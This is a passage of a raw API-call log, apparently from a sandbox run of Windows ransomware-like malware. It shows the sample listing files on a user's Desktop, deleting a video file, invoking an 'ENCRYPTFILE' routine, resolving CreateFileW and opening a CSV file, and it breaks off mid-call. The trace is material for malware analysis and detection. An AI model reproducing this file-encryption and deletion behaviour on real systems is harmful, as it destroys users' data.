ftLastAccessTime.dwLowDateTime=0xecc04980, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0xecc04980, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0x17a26, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AQwif8E74Z.avi", cAlternateFileName="AQWIF8~1.AVI")) returned 0x41ac280 [0120.585] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\AQwif8E74Z.avi" (normalized: "c:\\users\\fd1hvy\\desktop\\aqwif8e74z.avi")) returned 1 [0120.642] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864003a0, ftCreationTime.dwHighDateTime=0x1d5e0f1, ftLastAccessTime.dwLowDateTime=0xecc04980, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0xecc04980, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0x17a26, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="AQwif8E74Z.avi", cAlternateFileName="AQWIF8~1.AVI")) returned 0 [0120.643] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0120.643] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22c0 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0120.643] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.644] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0120.644] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.644] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4eb2670, ftCreationTime.dwHighDateTime=0x1d5e8af, ftLastAccessTime.dwLowDateTime=0x7e4b67d0, ftLastAccessTime.dwHighDateTime=0x1d5f018, ftLastWriteTime.dwLowDateTime=0x7e4b67d0, ftLastWriteTime.dwHighDateTime=0x1d5f018, nFileSizeHigh=0x0, nFileSizeLow=0x97a6, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="aYyiLdyhoIdALfth0-Sh.csv", cAlternateFileName="AYYILD~1.CSV")) returned 0x41ac600 [0120.645] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392500 [0120.645] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9cb0 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0120.645] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0120.646] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2320 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392260 [0120.646] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21d0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2130 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21e0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b90 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0120.646] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0120.647] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0120.648] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0120.648] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0120.649] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.650] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0120.650] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0120.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.651] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7a8 [0120.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0120.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.652] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0120.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.652] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0120.652] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x499a008 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0120.653] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0120.653] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\aYyiLdyhoIdALfth0-Sh.csv" (normalized: 